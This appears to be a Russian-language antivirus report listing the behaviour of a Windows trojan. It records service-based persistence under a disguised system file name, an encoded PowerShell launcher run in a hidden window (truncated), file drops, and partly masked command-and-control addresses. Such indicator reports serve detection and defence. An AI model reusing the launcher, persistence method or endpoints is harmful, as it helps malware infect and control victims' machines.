Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\NlsData0049] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\NlsData0049] 'ImagePath' = '"%WINDIR%\SysWOW64\AuditPolicyGPInterop\NlsData0049.exe"'
- 'NlsData0049' "%WINDIR%\SysWOW64\AuditPolicyGPInterop\NlsData0049.exe"
- 'NlsData0049' %WINDIR%\SysWOW64\AuditPolicyGPInterop\NlsData0049.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AG8AdQBjAGgAeAB1AHEAdQBxAHUAZQBoAHEAdQBlAHEAdQBoAGEAbwBuAD0AJwBqAHUAYQBuAGMAbwBhAHcAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBlAEMAdQBgAFIAaQBUAG...
- %HOMEPATH%\506.exe
- %WINDIR%\syswow64\auditpolicygpinterop\nlsdata0049.exe
- %HOMEPATH%\506.exe в %WINDIR%\syswow64\auditpolicygpinterop\nlsdata0049.exe
- '12#.#5.106.173':443
- http://fi####scinas.com/wp-admin/ympm/
- http://12#.##.106.173:443/MEkMDX2ofkUleBSOYVL/k3W3gdyOMqhlF/sTHWlE2Z/Ntyw6L8zo6AdaI4LOMr/ via 12#.#5.106.173
- DNS ASK ch###ubio.com
- DNS ASK fi####scinas.com
- '%HOMEPATH%\506.exe'
- '%WINDIR%\syswow64\auditpolicygpinterop\nlsdata0049.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AG8AdQBjAGgAeAB1AHEAdQBxAHUAZQBoAHEAdQBlAHEAdQBoAGEAbwBuAD0AJwBqAHUAYQBuAGMAbwBhAHcAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBlAEMAdQBgAFIAaQBUAG...' (со скрытым окном)